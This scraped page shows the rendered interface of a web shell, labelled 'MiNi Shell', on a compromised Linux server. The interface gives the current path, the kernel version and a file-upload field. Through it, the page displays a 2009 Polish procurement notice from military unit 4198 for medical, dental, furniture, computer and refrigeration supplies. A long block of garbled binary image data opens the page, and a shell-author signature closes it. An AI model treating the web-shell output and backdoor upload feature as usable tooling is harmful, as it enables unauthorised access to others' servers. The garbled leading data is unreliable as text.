JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20090601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20090601/174480-N-2009.html

<p class="kh_header"><b>Warszawa: Dostawa leków, materiałów medycznych, sprzętu i materiałów stomatologicznych, mebli lekarskich, chłodziarek farmaceutycznych oraz sprzętu komputerowego</b><br>
<b>Numer ogłoszenia: 174480 - 2009; data zamieszczenia: 01.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa nr 4198 , ul. Żwirki i Wigury 1C, 00-909 Warszawa, woj. mazowieckie, tel. 022 6821316, faks 022 6821316.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.1blot.sp.mil.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa nr 4198.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa leków, materiałów medycznych, sprzętu i materiałów stomatologicznych, mebli lekarskich, chłodziarek farmaceutycznych oraz sprzętu komputerowego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie nr 1: Dostawa leków i materiałów medycznych.
Zadanie nr 2: Dostawa materiałów i sprzętu stomatologicznego.
Zadanie nr 3: Dostawa mebli lekarskich.
Zadanie nr 4: Dostawa sprzętu komputerowego.
Zadanie nr 5: Dostawa chłodziarek farmaceutycznych..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.61.20.00-3, 33.14.18.00-8, 33.19.20.00-2, 30.21.31.00-6, 39.71.11.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy którzy:
 - spełniają warunki określone w art. 22 i nie podlegają wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2007r. nr 223 poz. 1655 z późn. zm.),
- spełniają warunki zawarte w Specyfikacji Istotnych Warunków Zamówienia. 

Zamawiający oceni spełnianie warunków udziału w postępowaniu na podstawie oświadczeń lub dokumentów złożonych przez wykonawców w systemie (spełnia - nie spełnia)..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu Zamawiający żąda złożenia wraz z ofertą:
 
1. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu do składania ofert.
(dotyczy wszystkich zadań)
2. Oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2007r. nr 223 poz. 1655 z późn. zm.) i ewentualnie zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
(dotyczy wszystkich zadań)
3. Wydruk ze strony Microsoft - potwierdzający poprawną współpracę oferowanych modeli komputerów z ww. systemem operacyjnym.
(dotyczy zadania nr 4 pozycji nr 2)
4. Oświadczenie producenta lub jego reprezentanta wraz z raportem badawczym wystawionym przez akredytowaną jednostkę, że głośność jednostki centralnej mierzona zgodnie z normą ISO 7779 oraz wykazana zgodnie z normą ISO 9296 w pozycji obserwatora w trybie jałowym (IDLE) wynosząca maksymalnie 21 dB .
(dotyczy zadania nr 4 pozycji nr 2)
5. Deklaracja zgodności CE.
(dotyczy zadania nr 4 pozycji nr 2 i zadania nr 5)
6. Oświadczenie producenta komputera, że w przypadku nie wywiązywania się z obowiązków gwarancyjnych oferenta lub firmy serwisującej, przejmie na siebie wszelkie zobowiązania związane z serwisem.
(dotyczy zadania nr 4 pozycji nr 1 i nr 2)
7. Dokumenty potwierdzające, że firma serwisująca posiada autoryzacje producenta komputera.
(dotyczy zadania nr 4 pozycji  nr 1).</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.1blot.sp.mil.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa nr 4198, 00-909 Warszawa ul. Żwirki i Wigury 1C, budynek 51, pokój nr 16..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2009 godzina 10:00, miejsce: Jednostka Wojskowa nr 4198, 00-909 Warszawa ul. Żwirki i Wigury 1C, budynek 51, pokój 214 - Kancelaria..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa leków i materiałów medycznych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa przedmiotu zamówienia	Jm.	Ilość ogółem
1. Adrenalina 10 amp/op	op.	2
2. Papawerinum chydrochloricum 40mg/2ml x 10	op.	3
3. Clemastinum 2mg/2ml x 5 amp	op.	7
4. No-Spa 40mg/2ml x 5 ml	op.	10
5. Phenazolinum 50mg/ml x 10 amp	op.	4
6. Ketonal 50mg/amp x 10 amp	op.	4
7. Corhydron 100 mg  5 amp. / op.	op.	5
8. Glukoza 20 %  10amp./op.	op.	3
9. Glukoza 5 % but.  500 ml	but.	20
10. PWE  but. 500 ml	but.	20
11. Tramal 50mg/ml x 5 amp.	op.	6
12. Bactigras 10x10 cm	szt.	40
13. Bactigras 15x20 cm x 10	op.	2
14. Bactigras 5x5 cm	szt.	40
15. No-Spa forte tabl x 20 tabl	op.	10
16. Paracetamol 500 mg x 20 tabl	op.	10
17. Nitrimint spray	szt.	5
18. NaCl 0,9 %  10 ml     100 amp/op	op.	4
19. Incidin/incidur 5 litrów	op.	4
20. Incidin/incidur 1 litr	op.	20
21. balsam do rąk Silonda	op.	30
22. żel dezynfekcyjny do rąk Prosavon/spitaderm	op.	30
23. Panthenol	szt.	5
24. Kodan	op.	6
25. pojemnik na mocz	szt.	100
26. pojemnik na kał	szt.	100
27. chusta trójkątna	szt.	20
28. woda utleniona 200 mg	szt.	100
29. kompresy jałowe 5x5 x 3 szt.	op.	100
30. otoskop	Zest.	1
31. końcówki jednorazowe do otoskopu	op.	3
32. Prześcieradła w rolce jednorazowego użytku szer.50	op.	10

Wymagania dodatkowe:
1. Dostawa na koszt Wykonawcy do Ambulatorium z Izbą Chorych JW 4198 ul. Kajakowa 11, 02-800 Warszawa.
2.  Wykonawca zobowiązany jest do dostawy przedmiotu zamówienia wraz z informacją zawierającą dane producenta, opis zawierający wskazania producenta, co do właściwości przedmiotu zamówienia, zasad bezpieczeństwa użytkowania (instrukcja użytkowania)  i terminów ważności. Wymagania te muszą znajdować się na lub w opakowaniu w formie ulotki, w zależności, której pozycji oferta dotyczy, zgodnie z obowiązującymi w tym zakresie przepisami.
3. Oferowane produkty, w zakresie objętym przedmiotem zamówienia, muszą posiadać wymagane odrębnymi przepisami właściwe zezwolenia dopuszczające do obrotu i stosowania w  zakładach opieki zdrowotnej.
4. Termin przydatności oferowanych produktów do użycia nie może być krótszy niż 12  miesięcy licząc od daty odbioru dostawy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.61.20.00-3, 33.64.22.00-4, 33.63.14.00-6, 33.67.50.00-2, 33.63.16.00-8, 33.62.21.00-7, 33.74.12.00-8, 33.74.13.00-9, 33.69.00.00-3, 33.63.16.00-3, 33.14.16.15-4, 33.14.16.00-6, 33.14.11.10-4, 33.14.11.19-7, 33.12.41.00-6, 33.12.41.30-5, 33.13.13.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa materiałów i sprzętu stomatologicznego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa przedmiotu zamówienia	Jm.	Ilość ogółem
1. Citocartin 1:100 000			op.	3
2. Xylodont 1:50 000			op.	1
3. Caustinerf Fort 45g			op.	1
4. Thymodentin 100g lub równoważny		op.	4
5. Eugenol 10g			             op.	2
6. Endomenthazon 14g			op.	1
7. Spongostan			             op.	1
8. Pulpomixina pasta 5g			op.	2
9. Chloran 2% 250 g			op.	6
10. Cresophene 13ml			op.	2
11. Biopulp 10g			             op.	2
12. Nipas			                          op.	2
13. Gutta - Percha asortyment		op.	4
14. Wytrawiacz Arkona 13 g lub równoważny	op.	4
15. Endosal 150 g			             op.	2
16. Alvogyl 12g			             op.	2
17. Harvard cement(proszek 35g + płyn15ml)	op.	4
18. Jodoform 30g			             op.	1
19. Natr.chloratum 0,9 500ml.		op.	30
20. Aqua pro inj. 5ml x 100 amp		op.	3
21. Dycal (baza + katalizator)		op.	1
22. Solcoseryl dental pasta 5g		szt.	2
23. Sachol żel			             szt.	2
24. Charisma chemoutwardzalna A30		op.	2
25. Amalgamat - AMALCAP PLUS   Nr 1	op.	2
26. Amalgamat - AMALCAP PLUS       Nr 2	op.	3
27. Sporal A			             op.	6
28. Poszerzacz kanałowy typK Reamer nr 15	op. (6 szt.).	4
29. Poszerzacz kanałowy typK Reamer nr 20 	op. (6 szt.)	2
30. Ślinociągi				op. (100 szt.)	10
31. Tacki jednorazowego użytku stomatologiczne 50 szt.		op.	8
32. Kubki plastikowe jed.użytku			             op.	10
33. Nici do szycia DAFILON 3/0   75 cm DS 24   24 mm		op.	1
34. Luna wałeczki - 500 sztuk			             op.	2
35. Sączki papierowe op.(200 sztuk w asortymencie)		op.	10
36. Serwety stomatologiczne (500 sztuk)			op.	2
37. Śliniaki z kieszenią (100 sztuk)			             op.	8
38. Rękawiczki latex x 100 szt  - rozmiar  S (6-7)		op.	10
39. Rękawiczki nitrylowe x 100 szt.  -rozmiar  M (7-8)             	op.	10
40. Rękawiczki lateksowe antyalergiczne/bezpudrowe - rozmiar S(6-7) op.	20
41. lignina rolka			                                           szt.	50
42. Igły do carpuli długie 0,4 dł.35mm. (100 szt. w opakowaniu)	     op.	1
43. Igły do carpuli krótkie 0,3 dł.16mm. (100 szt. w opakowaniu)	     op.	2
44. Wiertła diamentowe na turbinę - F 801314 nr 16 wg firmy EDENTA lub równoważne	szt.	14
45. Wiertła diamentowe na turbinę - F 859314 nr 16 wg firmy EDENTA lub równoważne	szt.	6
46. Wiertła na turbinę Finiry nr katalogowy wg firmy EDENTA C267 316 lub równoważne	szt.	4
47. Wiertła na kątnicę nr katalogowy wg firmy EDENTA 012 lub równoważny	szt.	10
48. Wiertła na kątnicę nr katalogowy wg firmy EDENTA 016 lub równoważny	szt.	10
49. Wiertła na kątnicę nr katalogowy wg firmy EDENTA 021 lub równoważny	szt.	10
50. Wiertła na kątnicę nr katalogowy wg firmy EDENTA 023 lub równoważny	szt.	10
51. Wiertła na kątnicę nr katalogowy wg firmy EDENTA 025 lub równoważny	szt.	10
52. Rękaw do sterylizacji szer. 250 mm 		op.        4
53. Myjka ultradźwiekowa 2,5 l	                          szt.	1
54. Koszyczki do myjki do wierteł			szt.	2
55. Vitrebond zestaw duży 7510			op.	1
56. Ketac-Molar Aplicap asort. 50 kaps.			op.	1
57. Aktywator do kapsułek + aplikator do kapsułek			op.	1
58. Fuji IX zestaw (3 x proszek +2 x płyn)			op.	1
59. AH Plus (baza + katalizator)			op.	2
60. Hawe Superpolish  			op.	2
61. Hawe Cleanic z fluorem 100 g.			op.	2
62. Hawe kliny światło 790 S set200szt. Ass			op.	1
63. Hawe paski cel. rolka			op.	3
64. Paski do form. Tłoczone na trzonowce i przedtrzonowce		op.	12
65. Paski cel. Ścierne rolka			op.	3
66. Sof-Lex set 2380			op.	1
67. Gumki Vivadent POLITIP 24 szt.lub równoważne		op.	1
68. Opti Bond solo plus			szt.	1
69. Szczotki metalowe do wierteł			szt.	4
70. Zestaw czyszczący  do Assistiny W&H service Oil Cleaning Solution	op.	1
71. Plugger Roeko ass 4 szt. 0,6-1,2			op.	1
72. Okulary ochronne 3 M pomarańczowe lub równoważne	szt.	2
73. Przyłbica ochronna oprawka + 5 wymiennych folii		szt.	2
74. Dźwignia Bein -  prosta wąska 			szt.	2
75. Dźwignia Bein  - boczna prawa			szt.	2
76. Dźwignia Bein  - boczna lewa			szt.	2
77. Endometr 5-tej generacji, wyświetlacz kolorowy	szt.	1
78. Mieszalnik do amalgamatu i do innych mat. kaps. z wyświetlaczem, możliwość reg.czasu 1-99s , osłona	szt.	2
79. Kątnica 1:1 tytanowa na mikrosilnik, podświetlenie, chłodzenie wew., spray 	szt.	2
80. Turbina tytanowa na szybkozłączkę, z podświetleniem diodowym, ceramiczne łożyska, spray 5 krotny	szt.	2
81. Szybkozłączka do turbiny tytanowa z podświetleniem		szt.	2
82. Wskaźniki chemiczne do autoklawu			op.	1
83. Ostrze skalera EMS TIP A			szt.	2
84. Ostrze skalera AMDENT nr 33 			szt.	2
85. Sterisol mydło 0,7 l			szt.	4
86. FD 333 - płyn do szybkiej dezynf. sprzętu stom. 			op.	3
87. ID 220 - koncentrat do czyszczenia wierteł 			op.	2
88. ID 213 - koncentrat do czyszczenia narzędzi obr.			op.	2
89. FD300 -koncentrat do dezynfekcji dużych pow.			op.	2

Wymagania dodatkowe:
1. Dostawa  na koszt Wykonawcy do Ambulatorium z Izbą Chorych JW 4198 ul. Kajakowa 11, 02-800 Warszawa.
2. Termin przydatności oferowanych produktów do użycia nie może być krótszy niż 12  miesięcy licząc od daty odbioru dostawy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.18.00-8, 33.66.11.00-2, 33.14.18.40-0, 33.14.18.30-7, 33.69.25.00-2, 33.14.18.10-1, 33.19.11.00-6, 33.13.10.00-7, 33.13.13.00-0, 33.13.12.00-9, 33.14.18.50-3, 33.13.15.10-5, 33.31.26.00-9, 33.14.18.10-1, 33.13.16.00-3, 33.13.60.00-2, 33.63.16.00-8, 18.14.20.00-6, 33.13.11.23-5, 33.13.40.00-8, 33.13.16.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa mebli lekarskich.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa przedmiotu zamówienia Ilość Opis
Szafa lekarska	szt. 1	Wymiary max 1640x1000x530 mm (wys. x szer. x głęb.) Szafa stojąca, metalowa dwudrzwiowa z drzwiami przeszklonymi (przeszklenie przezroczyste w ramkach metalowych o szer. ok. 55 mm); z uszczelkami  i zamkiem meblowym umożliwiającym blokowanie drzwi w dolnej części, z pięcioma półkami lakierowanymi, front szafki malowany proszkowo na kolor RAL 6034, pozostałe elementy malowane na kolor RAL 7035. Zawiasy w drzwiach samodomykające.
Szafa lekarska	szt. 2	Wymiary max 1640x1000x530 mm (wys. x szer. x głęb.) Szafa stojąca, metalowa dwudrzwiowa z drzwiami przeszklonymi (przeszklenie przezroczyste w ramkach metalowych o szer. ok. 55 mm); z uszczelkami i zamkiem meblowym umożliwiającym blokowanie drzwi w dolnej części, z pięcioma półkami lakierowanymi, front szafki malowany proszkowo na kolor  RAL 6019, pozostałe elementy malowane na kolor RAL 7035. Zawiasy w drzwiach samodomykające.	
Fotel lekarski gładki 	szt. 3	Siedzisko i oparcie pleców tapicerowane gąbką, pokrycie skóra ekologiczna, w kolorze czarnym. 
Regulacja wysokości siedziska sprężyną gazową z blokadą. Przejezdna pięcioramienna podstawa wykonana z tworzywa. 2 podłokietniki o szer. min. 60 mm. Regulacja wysokości siedziska: 430-620 mm(?20mm). Kąt odchylenia pleców 22 st. (?2 st.).	
Szafa kartotekowa 	szt. 4	Metalowe szafy kartotekowe na koperty formatu B5 w pionie. Całość szuflady zamykana jednym centralnym zamkiem. Szafa
posiada blokadę pozwalającą na wysuniecie tylko jednej szuflady, co
zachowuje jej stabilność. Szuflady
przesuwają się po prowadnicach
kulkowych z  samodomykaczem i blokadą
zabezpieczająca przed wypadnięciem. 
Szafa 4-szufladowa możliwość ułożenia dwóch rzędów kopert w szufladach, malowana proszkowo. 
wymiary zewnętrzne szafy: max 
szerokość 470 mm x głębokość
580mm x wysokość 1500mm ,
wymiary użytkowe szuflady : max
 szerokość 390 mm x głębokość
500mm x wysokość 300mm
2 sztuki: fronty RAL6019, pozostałe elementy w kolorze  RAL 7035
2 sztuki: czoła w kolorze RAL6034 pozostałe elementy w kolorze RAL 7035 

Biurko lekarskie	szt. 3	
Biurko składające się z n/w elementów:
Biurko proste o wymiarach (szer. x głęb. x wys.). 1200x700x750mm, nogi z płyty laminowanej w kolorze D 9164 BS (katalog Kronopolu lub równoważny), 2 przeloty na okablowanie w blacie rozmieszczone w narożnikach od strony frontowej; gr. blatu 28 mm, kolor blatu D 2460 MAT (katalog Kronopolu lub równoważny). Półka pod klawiaturę
Zabudowa od tyłu  ? wys. biurka w kolorze D 9164 BS  (katalog Kronopolu lub równoważny) - 2 sztuki. Kontener mobilny 3 szufladowy z centralnym zamkiem w kolorze: płaszcz RAL 1013, front RAL 8028 - 2 sztuki.
Skrzynka na komputer po stronie prawej (szer. x głęb. x wys.) 300x570x730mm - 2 szt.
 Dostawka ? elipsy o wym. (szer. x głęb. x wys.) 450x1100x750mm, blat w kolorze D 2460 MAT (katalog Kronopolu lub równoważny) na 2  nogach metalowych w kolorze satyny, blat gr. 28 mm - 1 szt.

Biurko proste o wymiarach (szer. x głęb. x wys.). 2000x600x900mm, z dwoma, wbudowanymi kontenerami 5 szufladowymi o głębokości min. 120 mm, rozmieszczonymi symetrycznie w kolorze: front RAL 5017, płaszcz w kolorze RAL 7035, kontenery zamontowane po stronie prawej, każdy o szer. 450 mm,
 gr. blatu 28 mm, kolor blatu 2270 (katalog JUAN lub równoważny) - 1 sztuka.

Wymagania dodatkowe:

1. Wyżej wymienione meble będą wniesione i zamontowane we wskazanej przez zamawiającego lokalizacji. Dostawa i montaż na koszt Wykonawcy do Ambulatorium  z Izbą Chorych JW 4198 ul. Kajakowa 11, 02-800 Warszawa. 
2. Wszystkie powierzchnie wyżej wymienionych mebli powinny mieć wszystkie powierzchnie zmywalne.
3. Uchwyty meblowe do wyboru przez zamawiającego.
4. Okres gwarancji minimum 24 miesiące licząc od daty odbioru dostawy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.20.00-2, 33.19.23.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawa sprzętu komputerowego.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pozycja nr 1: Dostawa Notebooków (laptopów) NBT  w ilości -  2 szt.  
Pozycja nr 2: Dostawa zestawów: komputer + monitor w ilości - 5 szt. 
Pozycja nr 3: Dostawa drukarek laserowych monochromatycznych A4  w ilości - 2 
szt.  
Szczegółowy opis przedmiotu zamówienia , znajduje się na stronie internetowej Zamawiającego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.21.33.00-8, 30.23.21.10-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa chłodziarek farmaceutycznych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa chłodziarek farmaceutycznych w  ilości  - 2  kpl.

Opis parametrów technicznych:
Pionowa witryna chłodnicza z przeszklonymi drzwiami.
Pojemność mieszcząca w zakresie 150 L -  200 L netto (bez zamrażalnika). 
Temperatura  mieszcząca się w zakresie 0 do +10 oC.
Wewnętrzne oświetlenie. 
Półki druciane - minimum 3.
Automatyczne odszranianie.
Zasilanie 230V AC 50 Hz.
Klasa energooszczędności co najmniej A.
Kolor biały.
System samozamykający drzwi.
Serwis i gwarancja:
Autoryzowany serwis gwarancyjny na terenie POLSKI.
Długość udzielanej gwarancji minimum 24 miesiące.
Gwarancja produkcji części zamiennych [ilość lat] min 10.

Dodatkowe wymagania:

1.  Deklaracja zgodności CE (Zgodnie z wymogami prawa polskiego).
2. Instrukcja obsługi i opis techniczny w języku polskim. 
3. Dostawa wraz z montażem wyżej wymienionego sprzętu na koszt Wykonawcy do Ambulatorium z Izbą Chorych JW. 4198 ul. Kajakowa 11 02-800 Warszawa oraz do Ambulatorium JW. 4198 ,ul Żwirki i Wigury 1 C, 00-909 Warszawa.
4. Oferowany sprzęt musi być kompletny i po dostarczeniu gotowy do pracy bez żadnych dodatkowych zakupów..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.11.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com